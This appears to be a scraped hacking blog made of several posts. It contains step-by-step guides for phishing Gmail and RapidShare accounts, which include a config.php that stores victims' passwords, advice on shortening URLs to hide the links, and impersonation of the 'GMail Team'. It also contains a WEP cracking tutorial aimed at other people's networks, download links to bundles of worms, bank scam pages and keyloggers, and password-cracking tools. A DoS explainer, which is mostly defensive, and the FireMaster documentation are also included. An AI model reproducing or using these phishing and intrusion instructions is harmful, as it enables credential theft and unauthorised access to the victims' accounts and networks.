Hacking Mafia

Gmail Phishing interesting

2011-01-13T06:14:00.001-08:00

gsecurety.t35.com/gmail.html

I TAKE NO RESPONSIBILITY WHAT you DO WITH THE INFORMATION PROVIDED IN THIS POST.

Crack WEP Tutorial WEP cracking [In 10mins]

2009-01-16T10:44:00.000-08:00

More Cracking WEP GUIDES and Information From
Intro:
Ok, this is a tutorial explaining how to crack most WEP encrypted Access Points out there. The tools used will be as follows:
Kismet (any working version)
>= Aireplay 2.2 beta
>= Aircrack 2.1
As for wireless cards, i recommend any Prism , Orinoco , or Atheros based cards (i used the D-Link 650 Rev.1a).

Getting Started:
Let's see, First thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit) Next you are going to want to load up your favourite live CD (i used Whoppix 2.7 final) or Linux OS, then stumble across a encrypted WLAN, use Kismet to do so. Make sure you have configured your kismet .conf file correctly to be able to use your card (locate your kismet.conf file and open with your favourite text editor, i used pico);

CODE

# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=orinoco,eth1,kismet
#source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone

^^ that is an example of part of my kismet.conf, initially that was wrong for me, i had to comment out the first line and uncomment the second (my wireless device name was wlan0, you can find this out by typing 'iwconfig' in a terminal).
Note: To find your cards chipset have a good google on the model number of your card or try checking here http://www.linux-wlan.org/docs/wlan_adapters.html.gz . A full list of supported chipsets can
be found on the Kismet website under Documentation.
Changed kismet.conf:

CODE

# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
#source=orinoco,eth1,kismet
source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone

Save the changes you make and go back to a terminal and run 'kismet', it should load up if you configd it properly. Once you have got kismet going, have a good stumble around your area, to see if a WLAN has WEP enabled, kismet should have a column near the ESSID titled with 'W' if it has WEP enabled it will have a Y, if not it will be a N.
Going in for the kill:
So now you got a target you are going to make sure you dont look suspicious and you got at least 15mins worth of battery life left Razz. Making sure you know the channel the Access Point is on (under the CH cloumn in kismet) and also the mac address of the Access Point by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected.
First off you are going to want to set your wireless card to the right mode, depending on what chipset depends on what commands you have got to use:

CODE

If you use madwifi, you may have to place the card in
pure 802.11b mode first:
iwpriv ath0 mode 2
If you use wlan-ng, run
./wlanng.sh start wlan0 [comes with AirePlay2.2]
Otherwise run:
iwconfig ath0 mode Monitor channel
ifconfig ath0 up

Read the AirePlay2.2 readme for more info.
Start by opening up another terminal window and cd into your aircrack directory and launch airodump:
Code:
#./airodump
[version crap]
usage: ./airodump [mac filter]
e.g
./airodump wlan0 linksys
The mac filter is used when you have more than one Access point on the same channel at once, so say you have 'jim_home' and 'linksys' both essid's of access points both on channel 11 you would grab the mac address of of the Access Point in kismet, by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected. Ok so now you have got a stream of packets from your target, you see the IV column, those are whats known as 'weak key' packets, we want as many of them as we can get (400k+ is a nice number Razz). Now we are going to capture a 'weak key' packet from on the network we are targeting and going to flood the Access Point with it in hope that we get lots of 'weak key' replies sent out so we can eventually crack the password. So now in your other terminal window 'cd' into your aireplay directory and execute aireplay ('./aireplay'[return]):

CODE

capture packets unless interface #1 is specified.
source options:
-i : capture packet on-the-fly (default)
-r file : extract packet from this pcap file
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length, default: 40
-n len : maximum packet length, default: 512
-u type : fc, type - default: 2 = data
-v subt : fc, subtype - default: 0 = normal
-t tods : fc, To DS bit - default: any
-f fromds : fc, From DS bit - default: any
-w iswep : fc, WEP bit - default: 1
-y : don't ask questions, assume yes
replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-o fc0 : set frame control[0] (hex)
-p fc1 : set frame control[1] (hex)
-k : turn chopchop attack on

e.g
./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0
Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet which then aireplay will ask you if you want to use to then flood the Access Point with that packet. when it asks you if it can use one of the packets hit 'y' then return. If you flick back to your terminal with airodump running you should see the packets being captured will increase by a huge amount and with that the IV packets should also be increasing pretty damn fast aswell, if all went well in about 10mins you should have enough packets to then dump into aircrack. Ok so you want at least 400k+ IV packets (the more the better), once you got a decent amount hit 'control+c' in both terminal windows to terminate both aireplay and airodump, now 'cd' into your aircrack directory and run aircrack ('./aircrack'[return]):

CODE

aircrack 2.1 - (C) 2004 Christophe Devine
usage: ./aircrack [options] ...
-d : debug - specify beginning of the key
-f : bruteforce fudge factor (default: 2)
-m : MAC address to filter usable packets
-n : WEP key length: 64 / 128 / 256 / 512
-p : SMP support: # of processes to start
-q : Quiet mode (less print more speed)

e.g
./aircrack -n 128 linksys.cap
what i did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and telling aircrack it was a 128 bit encryption. If all goes well you will get the key in nice red text.
KEY FOUND: [ Pwn3d ]
Happy WarDriving.
(Please reply with any errors in my tutorial

Denial-Of-Services Attack - Detailed Explanation

2008-12-17T10:23:00.000-08:00

Demystifying Denial-Of-Service attacks, part one By Admin @ Techmaifas. This paper provides an introduction to Denial of Service (DoS) attacks, their methodologies, common prevention techniques, and how they differ from Distributed Denial of Service (DDoS) Attacks. This article is intended to be a broad overview for the beginner or intermediate-level administrator on the different types of DoS attacks.

1. Definitions

We begin by defining Denial of Service and Distributed Denial of Service.

1.1 What is a DoS?

As the name implies, DoS is a Denial of Service to a victim trying to access a resource. In many cases it can be safey said that the attack requires a protocol flaw as well as some kind of network amplification.

Denial of Services is also an attack on a computer system or network that causes a loss of service to users, typically the loss of network connectivity and services through the the consumption of bandwidth of the victim network, or the overloading the computational resources of the victim system. (see the Wikipedia definition)

The motivation for DoS attacks is not to break into a system. Instead, it is to deny the legitimate use of the system or network to others who need its services. One can say that this will typically happen through one of the following means:

1. Crashing the system.
2. Deny communication between systems.
3. Bring the network or the system down or have it operate at a reduced speed which affects productivity.
4. Hang the system, which is more dangerous than crashing since there is no automatic reboot. Productivity can be disrupted indefinitely.

DoS attacks can also be major components of other type of attacks.

1.2 What is a Distributed DoS?

A Distributed DoS (DDoS) is the combined effort of several machines to bring down victim. In many cases there is a master machine that launches the attack to zombie machines that are part of a bot network, as shown below in Figure 1. Some bot networks contain many thousands of machines used to launch an attack.

With DoS and DDos defined, we'll now take a look at attacks that affect the consumption of resources, such as Smurf attacks, and then address attacks like SYN Flood that affect network connectivity.

Note that the consumption of resources is most evident when it involves the exploitation of bandwidth, CPU usage, memory, disk space, or access to other computers and resources.

2. Bandwidth exhaustion attacks

A bandwidth exhaustion attack is where an attacker tries to consume the available bandwidth of a network by sending a flood of packets. This is most often accomplished with the help of several other machines. There is soon a flood of malicious nonsense packets on the network in large quantity, whereby the chances of survival of any good, legitimate packets becomes remote. Eventually the network becomes choked with these packets, and the network is effectively cutoff from the Internet and services are denied.

An ideal example of a bandwidth exhaustion attack would be Smurf attacks. Consider a scenario with an ISP and three clients, as shown below in Figure 2. In this scenario, the ISP receives extensive traffic for client 2 on its backbone. Since the connection to client 2 is of limited capacity and smaller than the ISP's backbone, it can't push all the data received for client 2 through the link to client 2. Therefore it will start to drop packets, and the TCP connections will lead to retransmissions of the lost/dropped packets. There will be a time when a legitimate host wants to connect to Client 2's network, but this will timeout and hence a DoS will occur.

2.1 Smurf Attack

Named after a popular program which generates this attack, an ICMP echo request is sent to a broadcast network address (acting as an amplifying agent) with the source address of the victim spoofed. This results in a storm of replies from that network which, if large enough, has the power to take the victim's network down. It is to be noted that there is not much a victim can do about this attack since the link is simply overloaded with packets.

There are always three parts of a Smurf Attack:

1. Attacker
2. Amplifier - a router
3. Victim

This attack succeeds because the amplifier is misconfugred to forward the directed broadcasts.

Suppose the address range 172.30.164.0 to 172.30.164.255 is assigned to a company which has an amplifier, and an attacker sends packets with destination 172.20.164.255. All the routers and systems from attacker to the amplifier will not see the difference between this IP and 172.30.164.10 (an IP from the range). The packet reaches the amplifier and the amplifier notices that this is the broadcast address, so it forwards the request to all the systems on the network/subnet. This is known as directed broadcast.

The two crucial components of this attack were:

1. A misconfigured router forwarding the broadcast request to the subnet.
2. Machines that will respond to this ICMP broadcast request.

Going deeper we can see that the amplifier also makes itself and its network a victim of this attack.

Victims are typically chosen by attackers from IRC where bots (automated programs) are kept to look for the address of victims. Hackers often exchange the information about amplifiers with each other so when a mass attack takes palce it usually appears to come from all over the globe.

Powertech provides realtime statistics of the top amplifiers currently on the Internet.

Below is a typical depiction of the dumps at the Victim. These are ICMP Echo replies received at the Victim's end. Then Figure 3 provides an overview of a Smurf attack.

Code:

10:10:17.100000 172.30.164.1   > victim:  icmp: echo reply 10:10:18.300000 172.30.164.76 > victim:  icmp: echo reply 10:10:18.310000 172.30.164.10 > victim:  icmp: echo reply 10:10:19.110000 172.30.164.223 > victim:  icmp: echo reply 10:11:09.190000 172.30.164.51 > victim:  icmp: echo reply 10:11:09.240000 172.30.164.18 > victim:  icmp: echo reply 10:11:10.110000 172.30.164.98 > victim:  icmp: echo reply 10:11:10.600000 172.30.164.18 > victim:  icmp: echo reply 10:11:10.790000 172.30.164.240 > victim:  icmp: echo reply

2.2 How to protect against Smurf attacks

Step 1. Amplifier Configuration. The router should be configured so that it does not forward directed broadcasts onto networks. It is important to note that the broadcast has to be disabled on all the routers and not merely just the external ones. Command "no ip directed-broadcast" on Cisco routers should do the job in most cases. This will also ensure that employees on the internal network won't be able to launch Smurf attacks. However it is also advisable that one has a filtering device (such as a firewall) on the perimeter, thereby providing an extra layer of security.

Step 2. Configure the server operating systems. Servers should be configured so that they will not respond to a directed broadcast request. FreeBSD is one such system which by default does not respond to this request. Other systems can be similarly configured, and this will be discussed in the next section.

Step 3. Victim issues. As mentioned earlier, not much can be done at the victim's end and damage will be done unless victim's ISP takes some actions to block these ICMP Echo Reply floods. Even if the victim's parameter router denies the ICMP Echo Reply, the link from the ISP to the victim's site will suffer.
2.3 ICMP Ping Flood attacks

Ping Floods are where an attacker floods the victim's network with large number of ICMP Echo Requests - such as by flooding the network as fast as possible. In this scenario, filtering the incoming packets might help, however, if the victim is on a modem instead of a high-speed connection, nothing can be done. However the catch in this attack is that if not done properly the attacker can also be counter-attacked, so he needs to be on a faster network than the victim. In most cases, mitigating this attack involves isolating spoofed IPs. This attack is easy to peform since there are many tools on Internet and little knowledge is required to execute a ping flood.
2.4 Fraggle attacks

A Fraggle attack is a Smurf variant that uses UDP instead of ICMP. In this case, the ports echo, chargen, daytime, qotd are used to trigger responses. These ports are also susceptible to a pingpong attack, and therefore these serves should be turned off or blocked.

3. Network connectivity attacks

These attacks overload the victim so that its TCP/IP stack is not able to handle any further conections, and processing queues are completely full with nonsense malicious packets. As a consequence of this attack, legitimate connections are denied. One classic example of a network connectivity attack is a SYN Flood.
3.1 Example: SYN Flood attacks

A SYN Flood is where an attacker sends packets with a spoofed source IP Address and a TCP SYN Flag set to the server (victim). Let's first assume that the attacker knows which ports are open on the server. Since the source IP is spoofed, the response sent to the SYN packet by the server will never receive a reply back. The server will keep waiting until it times out. If this happens for a very large number of connections the result will be a DoS, since the server won't be available for any legitimate connections and its resources will be choked.

As will be shown, this attack exploits a vulnerability of the TCP protocol, by the way in which the TCP three-way connection is established. This is shown below in Figure 4.

3.2 Protecting against SYN Flood attacks

There are several things that can be done to protect against SYN Flood attacks.

1. Decrease the TCP Connection Timeout on the victim server.
2. Use a filtering device, like a firewall, at the perimeter which works as an intermediary in forwarding the connections to the server.
Use of a server farm: this can also help in fighting the SYN Flood since you will have number of the servers to answer the request, but this also has limitations and overhead considerations.

A detailed article on SYN Flood protection by Mariusz Burdach was previously published on SecurityFocus. Therefore, only a short overview of SYN Flood protection will be discussed in this section.
3.2.1 Protecting Microsoft Windows from a SYN Flood attack

Microsoft Windows has a mechanism to detect and start SYN Flood protection. The SYN flooding attack protection feature detects symptoms of SYN flooding and responds by reducing the time the server spends on connection requests that it cannot acknowledge.

Specifically, TCP shortens the required interval between SYN-ACK (connection request acknowledgements) retransmissions. TCP retransmits SYN-ACKS when they are not answered. As a result, the allotted number of retransmissions is consumed more quickly and the unacknowledgeable connection request is discarded faster.

When enabled, the system monitors the connections maintained by TCP and starts the SYN attack flooding protection when the any of the following conditions, symptomatic of SYN flooding, are found:

* The total number of connections in the half-open (SYN-RCVD) state exceeds the value of TcpMaxHalfOpen
* The number of connections that remain in the half-open (SYN-RCVD) state even after a connection request has been retransmitted exceeds the value of TcpMaxHalfOpenRetried
* The number of connection requests the system refuses exceeds the value of TcpMaxPortsExhausted. The system must refuse all connection requests when its reserve of open connection ports runs out.

Microsoft suggests the following registry settings:

Code:

hkey_local_machine \system \currentcontrolset \services  \tcpip \parameters \synattackprotect=1 REG_DWORD   hkey_local_machine \system \currentcontrolset \services \tcpip  \parameters \tcpmaxconnectresponseretransmissions=2 REG_DWORD   hkey_local_machine \system \currentcontrolset \services \tcpip  \parameters \tcpmaxdataretransmissions=3 REG_DWORD

3.2.2 Check Point protections against a SYN Flood attack

In the first scenario, we look at Check Point as a simple proxy to the victim server. This is shown below in Figure 5.

In this scenario Check Point acts a proxy to the server and responds to all the requests sent to the server. A request is forwarded to the server only if there is a corresponding ACK. The drawback of this configuration is that normally a perimeter firewall is very heavily loaded and this configuration will induce further load on it. The advantage is that the server will always be free to only take legitimate connections.

In the second scenario, we look at Check Point preventing a SYN Flood attack while residing in a transparent proxy configuration. This is shown below in Figure 6.

Here Check Point passes all the connections, irrespective of whether they are legitimate or not, to the server but also starts a timer once it sees a ACK/SYN from the server. If there is no corresponding ACK from the Client and the timer expires, the firewall will send a RST to the server thereby preventing its queue from overflowing with illegitimate connections. The advantage of this configuration is that load on firewall is reduced considerably as compared to previous configuration. The drawback, however, is that now the server sees all the connection attempts.

4. Conclusion

In this article we've defined DoS and DDoS and looked at attacks that affect the consumption of bandwidth: Smurf attacks, ICMP ping floods, and Fraggle attacks. We've also taken a first look at attacks that affect network connectivity, such as SYN Flood attacks and some of the ways to prevent them.

Next time in part two, we'll look at the consumption of other precious resources such as CPU time, disk space, memory utilization, and then examine any vulnerable printers that may be DoS attack vectors on the network. We'll also discuss Teardrop attacks, LAND attacks, Ping-of-death, and finally discuss some common Win32 worms that have been used to build botnets that perform broad DDoS attacks. Finally, we'll discuss mitigation techniques and best practices for preventing DoS attacks. Stay tuned.

WinRar Password Remover

2008-12-17T10:22:00.001-08:00

RAR Password Recovery is a powerful tool to recover lost (forgotten) passwords for a RAR/WinRAR (2.xx and 3.xx) archives. The program supports the "brute-force" attack, dictionary-based attack and dramatically fastest "Booost-Up" attack. The program is able to resume the previous interrupted attack..

Here is a brief list of RAR Password Recovery advantages:

Recovers passwords for a RAR/WinRAR archives of versions 2.xx and 3.xx using combination of Brute-Force, Booost-Up or Dictionary attacks.
Very high speed of work (more than 3000 passwords per second in Brute-Force mode and up to 22000 passwords per second in Booost-Up mode).
Customizability.
Advanced heuristic processor.
User-friendly interface.
Large wordlist dictionary.
Ability to work in the background.
Autosave feature.

Code:

http://rapidshare.com/files/10696634...emover_1.1.rar

USerful Hack Tools {Best of 2008}

2008-12-17T10:17:00.000-08:00

This download would be detected as virus, but dont worry all of the tools have malicious code which will help you to hack. But it wont do anything wrong to your computer.

What does it have?
AddrView.rar
AnonFTP.zip
AOL new.rar
AppToService.rar
arpinject.zip
aspack21.zip
Astaroth Joiner v2.rar
atk-2.1.zip
BankOfAmerica.rar
bios_pass_remover.zip
BlasterW32.zip
blue.zip
bmpripper.zip
brutus.zip
Cable Modem Sniffer.rar
CapKeys_DIGITAL.rar
CASXM138.zip
CAYZODQF.zip
CGI Founder v1.043.zip
cgis4.zip
CGISscan.zip
cia10.zip
cports.rar
craagle.zip
Crackftp.zip
CreditCardGjenerator.rar
Davs_TR_REtail.zip
DDL Sites.rar
DeepUnFreez.zip
DrVBS.zip
eBay.rar
EESBinder.zip
egold.rar
E-mail Cracker.rar
ezDataBase_Defacer.rar
F.B.I - Binder.rar
FTP Brute Forcer.rar
ftpbr.zip
~Censored~ Mail Bomber 2.3.rar
G00B3RS_phpBB_exploit_pack.rar
genxe-beta-0.9.0.zip
Google_Hacker_1.2.rar
grinder1.1.zip
Hack FLASH Template.zip
Hack MY Space.zip
Hack Photoshop CS2.zip
HackersAssistant.zip
HackTheGame.zip
hck.zip
hlboom.zip.zip
Hook Tool Box.rar
Hotmail Email Hacker.rar
Hotmail HAcker Gold.rar
Hotmail ScamPage.zip
HotmailHack.rar
HSBC-US.rar
hydra-4.6-win.zip
iecv.rar
IP2.rar
ipnetinfo.rar
john-17w.zip
Key Changer.rar
Key_Logger.zip
Legion NetBios Scanner v2.1.zip
Mail Boomb_2.0 YAHOO.zip
MIDNITEmassacre.zip
MooreR Port Scanner.rar
MSN Flooder 2.0.rar
MSN Messenger Account Cracker v2.0.rar
MSNLoader.rar
NET BIOS Scaner.rar
NetBIOS Name Scanner.rar
NetResView.rar
NFO Maker 1.0.zip
Nimda.zip
nkedb.zip
nolimitcracker.rar
NTPacker.zip
nts.zip
NullAddFrontend.zip
On-Off MSN.rar
OS Update Hack.rar
P0kes WormGen 2.0.zip
panther.zip
PayPal.rar
PCAnyPass.rar
Php Nuke Hacker v11.0.rar
phpBB Annihilator.rar
phpbb attack.rar
phpbb bruteforcer.rar
PhpBB pass extractor.zip
phpBB_DoS.rar
phpbb_spammer.rar
phpBBAttacker.rar
phpBBAttacker.zip
phpBBcracker.rar
PhpBuGScan.rar
~censored~.rar
PhpNuke_bypass.rar
Ping & Nukes.rar
Port Listener XP.rar
pqwak2.zip
procexp.rar
ProMo.rar
ProxyPro.zip
Pure phpBB Email harvester.rar
rainbowcrack-1.2-src win-lin.zip
Remote Shut Down.rar
ResHacker.zip
Rocket.zip
rpc.zip
RpcScan101.zip
Sasser.zip
SendMailer.zip
Server 2003 Keygen.rar
Server Killer.rar
showpassv10.zip
sitedigger2.zip
smbat-win32bin-1.0.4.zip
SMBdie.zip
smbproxy-win32bin-1.0.0.zip
Source Checker.rar
source codes.rar
sprut.zip
SQLScan v1.0.rar
Stealth - HTTP Scanner v1.0 build 23.zip
super.zip
SuperScan4.rar
tftpd32.273.zip
thunter.zip
TinaSoft KILL.zip
traceroute.rar
UC.Forum Spam.rar
udpflood.zip
Ultra Dos.zip
USBank.rar
Visa Spam.zip
Warez Sites.rar
Web Cracker 2.0.rar
WebCracker 4.0.rar
whoistd.rar
Win XP Activator.rar
WindowHide.rar
Windows XP Corperate Keygen.rar
Windows XP KeyGen.rar
Windows XP Product Key Changer.rar
Windows XP Product Key Checker.rar
Windows XP Product Key Viewer.rar
WindowsAdminpasswordHack.rar
wwwhack.rar
xpass.zip
xplizer.rar
Yahoo Password.zip
yahooUltraCracker.rar
zehir.zip

Code:

RapidShare: Easy Filehosting

RapidShare Hacking

2008-12-17T10:15:00.000-08:00

U must have noticed many rapidshare account posted on the site... i have got many members asking me how i did it.... so heres the way... enjoy phishing... please remember to share them on the website as we cant change the password.... only owner of the account can change the pass.

1. You will need to have the phishing files which u can download from

Code:

http://rapidshare.com/files/133074712/D0nt_Angry_TOT_By_Max.rar

2. Once you download these files u will need to upload them to a webhost so everyone can see that here are some list of free webhosts...

Code:

www.freewebs.com www.ripway.com www.247mbhosting.com or any other u know

3. Now upload all of the files to your webhost.

4. Now one of the files in the download would be "config.php" which will need to edit. So open that file with notepad.

5. Find this text in that file

PHP Code:

     $website = "http://h1.ripway.com/yourusername/"; //Full Path To Install
$phishingnet="yourPhisherpasswords.txt" //Textfile Where To Store The Accounts
?>

6. Just make appropriate changes to this code as per the webhost name and the folder where you have uploaded the phishing files.

7. Now here goes the format of the link which u can give to the victim in order to steal their password.

Code:

http://yourname.Phisherhost.com/rapidshare/download.php?link=[some_real_rapidsharelink]&size=[size_of_the_file]

8. Now you're all set... just give this phishing link to the victim which will exactly look like the rapidshare page and even he will download the file whicheva u give the link for... but the only difference would be username and password would be send to you as well

Additional Tips:-

As you know now you would have long URL's which looks suspicious to advanced users, so what u can do is u can try to shorten the URL with some free websites... here are some examples.

Code:

http://snurl.com/site/index http://hide-url.net/ http://www.protectlinks.com/ http://rapidsafe.de/ http://www.shorturl.com

So enjoy RapidShare hacking...

FireMaster The Firefox Master Password Recovery Too

2008-12-13T22:18:00.000-08:00

History

Version 3.1: 28th Sep 2008

Fixed the bug in recovering the master password for Iceweasel which is browser derived from Firefox.

Version 3.0: 29th July 2008

Support for Firefox version 3.0, now you can recover the master password of latest version of Firefox. The differences in reading the Firefox key database file is resolved.

Kudos to the Firefox crew for yet another beautiful version of Firefox...!

Version 2.5: 22nd March 2008

Pattern based brute force password recovery method is implemented which reduces the time considerably when certain part of the password is already known. Also minimum length of password can be specified which improves the recovery time greatly.

Usage is simplified by forcing one crack method at a time and providing better meaningful options. Fixed the bug in displaying statistics and now it displays the remaining time accurately based on the current speed which is computed dynamically.

Thanks for your suggestions and feedbacks...

Version 2.2: 8th July 2006

FireMaster source code is released under GPL v2.

Version 2.1: 18th June 2006

Tested successfully with latest version 1.5.0.4 of Firefox.

Statistics display during the operation is improved.

Version 2.0: 25th Feb 2006

First public release of FireMaster SOURCE code.

Now it works at amazing speed of 50k passwords per second on normal m/c.

Firefox library dependency is removed completely.

For brute force, speed and time is displayed during operation.

Lots of optimizations and few bug fixes.

Thanks to 'T Barton' for reporting the bug with 1.5 version.

Version 1.5: 14th Jan 2006

Bug in parsing key3.db fixed.

Displaying results during recovery operation.

Speed is doubled compared to the original version.

Version 1.0: 1st Jan 2006

First public release of FireMaster.

About FireMaster

Firemaster is the Firefox master password recovery tool. Firefox uses master password to protect the stored sign-on information for various websites. If the master password is forgotten, then there is no way to recover the master password and user has to lose all the sign-on information stored in it. To prevent this problem, I have developed FireMaster which uses combination of techniques such as dictionary, hybrid and brute force to recover the master password from the Firefox key database file.

About Firefox Password Manager and Master Password

Firefox comes with built-in password manager tool which remembers username and passwords for all the websites you visit. This sign-on information is stored in the encrypted form in Firefox database files residing in user's profile directory. However any body can just launch the password manager from the Firefox browser and view the credentials. Also one can just copy these database files to different machine and view it offline using the tools such as FirePassword.

Hence to protect from such threats, Firefox uses master password to provide enhanced security. By default Firefox does not set the master password. However once you have set the master password, you need to provide it every time to view sign-on credentials.So if you have lost the master password, then you have lost all the stored credentials as well.

So far there was no way to recover these credentials once you have lost the master password. Now the FireMaster can help you to recover the master password and get back all the sign-on information.

Internals of FireMaster

Once you have lost master password, there is no way to recover it as it is not stored at all. Whenever user enters the master password, Firefox uses it to decrypt the encrypted data associated with the known string. If the decrypted data matches this known string then the entered password is correct. FireMaster uses the similar technique to check for the master password, but in more optimized way. The entire operation goes like this.

FireMaster generates passwords on the fly through various methods.
Then it computes the hash of the password using known algorithm.
Next this password hash is used to decrypt the encrypted data for known plain text (i.e. "password-check").
Now if the decrypted string matches with the known plain text (i.e. "password-check") then the generated password is the master password.

Firefox stores the details about encrypted string, salt, algorithm and version information in key database file key3.db in the user's profile directory. You can just copy this key3.db file to different directory and specify the corresponding path to FireMaster. You can also copy this key3.db to any other high end machine for faster recovery operation.

FireMaster supports following password generation methods

1) Dictionary Method

In this mode, FireMaster uses dictionary file having each word on separate line to perform the operation. You can find lot of online dictionary with different sizes and pass it on to Firemaster. This method is more quicker and can find out common passwords.

2) Hybrid Method

This is advanced dictionary method, in which each word in the dictionary file is prefixed or suffixed with generated word from known character list. This can find out password like pass123, 12test, test34 etc. From the specified character list (such as 123), all combinations of strings are generated and appended or prefixed to the dictionary word based on user settings.

3) Brute Force Method

In this method, all possible combinations of words from given character list is generated and then subjected to cracking process. This may take long time depending upon the number of characters and position count specified.

How to use FireMaster?

First you need to copy the key3.db file to temporary directory. Later you have to specify this directory path for FireMaster as a last argument.

Here is the general usage information

Firemaster [-q] 
           [-d -f ] 
           [-h -f  -n  -g "charlist" [ -s | -p ] ]
           [-b -m  -l  -c "charlist" -p "pattern" ]
           

Dictionary Crack Options:

-d	Perform dictionary crack
-f	Dictionary file with words on each line

Hybrid Crack Options:

-h	Perform hybrid crack operation using dictionary passwords. Hybrid crack can find passwords like pass123, 123pass etc
-f	Dictionary file with words on each line
-g	Group of characters used for generating the strings
-n	Maximum length of strings to be generated using above character list These strings are added to the dictionary word to form the password
-s	Suffix the generated characters to the dictionary word(pass123)
-p	Prefix the generated characters to the dictionary word(123pass)

Brute Force Crack Options:

-b	Perform brute force crack
-c	Character list used for brute force cracking process
-m	[Optional] Specify the minimum length of password
-l	Specify the maximum length of password
-p	[Optional] Specify the pattern for the password

Sample Usage Information

// Dictionary Crack

FireMaster.exe -d -f c:\dictfile.txt Firefox_Profile_Path

// Hybrid Crack

FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s Firefox_Profile_Path

 // Brute Force Crack

FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??123" Firefox_Profile_Path

Here Firefox_Profile_Path refers to the directory where key3.db file is present. This points to the Firefox profile directory (Ex: C:\Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\) on your machine. However you can also copy key3.db file from any other machine such as Linux system to your local windows machine and specify that path during recovering operation.

Quiet mode ( -q option ) will disable printing each password while recovery is in progress. This makes it much faster especially for brute force operation. However during brute force operation if the password count exceeds 50000 passwords then it automatically enters the quiet mode.

Hybrid method tries normal dictionary password as well as password created by appending/prefixing the generated strings to the dictionary word. For example if the dictionary word is "test" and you have specified character set as '123' (-c 123 -s) then the new passwords will be test1, test12, test123, test32 etc.

Character list (-g for hybrid and -c for brute force) specifies the characters to be used for generating passwords. If you don't specify then the default character list is used. For brute force -m indicates the minimum length of password to be generated. This can reduce the generated passwords and hence the time considerably when large number of character set is specified. Similarly -l (small 'L') specifies the maximum length of password to be generated. For example, if you specify -m 6 and -l 8 then only passwords which are of length at least 6 and above but below 8 will be generated.

Now you can reduce the password cracking time significantly using pattern based password recovery mechanism. If you know that password is of certain length and also remember few characters then you can specify that pattern for brute force cracking. For example, assume that you have set the master password of length 12 and it begins with 'fire' and ends with '123' then command will look like below

FireMaster.exe -b -c "abyz" -l 12 -p "fire?????123" c:\testpath

This will reduce the time to seconds which otherwise would have taken days or hours to crack that password. You can even crack the impossible looking passwords using the right pattern.

FireMaster in Action

FireMaster and FireFox

FireMaster is tested with latest Firefox version 3.0 and should work with any Firefox having version 1.0 or more.

If the FireMaster failed to work with your Firefox then please send me the key3.db and cert8.db (required for older versions) files which are present in your Firefox profile directory. Note that sign-on credentials are stored in the signons.txt file and key3.db just contains the master password related information. So even if some one knows your master password it will be useless unless he/she has access to signons.txt file.

Disclaimer

FireMaster is designed with good intention to recover the lost master password so that every one keep enjoying their experience with Firefox. Like any other tool its use either good or bad, depends upon the user who uses it. However author is not responsible for damages or impact caused due to misuse of FireMaster.

Acknowledgement

Thanks to the Mozilla-Firefox crew for making such an excellent, beautiful, free browser.

Thanks to everyone who shared their experience with FireMaster and sending the valuable feedbacks and suggestions.

Download FireMaster

If you want to build the FireMaster from the source then you need to download the Gecko SDK from Mozilla website.

FireMaster 3.1 binary & source download

Hacking GMail Accounts

2008-11-29T00:41:00.000-08:00

Hacking GMail Accounts
Step 1 : Create your own fake gmail login form using HTML, which may look like one as shown below-

http://i37.tinypic.com/2mmsbx0.gif

Here's the html required:
http://www.mediafire.com/?htynwzcwxek

Step 2:
We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.
The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address.
This can be done in two ways-

1) Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. Which may be something like following-

Your form must start with the following

HTML tag:

You must also include the following hidden configuration fields
in your form so that formmail.com knows what account and form processor
to use on the submitted data:

You must also inform this form processor who you wish to have your
form results emailed to. To do so, you must include a hidden form
field that specifies the recipient:

Please Note: the above field will work, but an even better solution
is to use the ID number for that email address (thus hiding your
address from spammers):

Continued..
Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use.
Now you can send the fake gmail login form as an html mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and click on 'Move' button.
Note that, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to victim.
As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com .
That's It............!

This is a common fake page login
But it works!
For newbies.
Ignore if you already know

BLUETOOTH REMOTE CONTROL V2

2008-11-28T00:33:00.001-08:00

Control Your Pc from your cell phone.
Appz like media player, Ms Office and many more.
Control your mouse pointer and see your desktop on your mobile screen.

100% WORKING

Very Good product,Enjoy
http://rapidshare.com/files/146250062/Bluetooth_mahek_cw.rar

ALL IN ONE : ULTRA HACKER 155 IN 1

2008-11-28T00:32:00.001-08:00

155 Hack Tools All in One:
Anon FTP
BMP Ripper
CIA 10
FTP BR
Hack the game
Brutus
Genxe
AsPack 21
Hack flash template
Hydra
Hack My space
Blaster W32
and more...

Note: these are hack tools and may be detected as viruses/spyware by antivirus/spyware programs. Use at your own risk.

Download: 58 MB

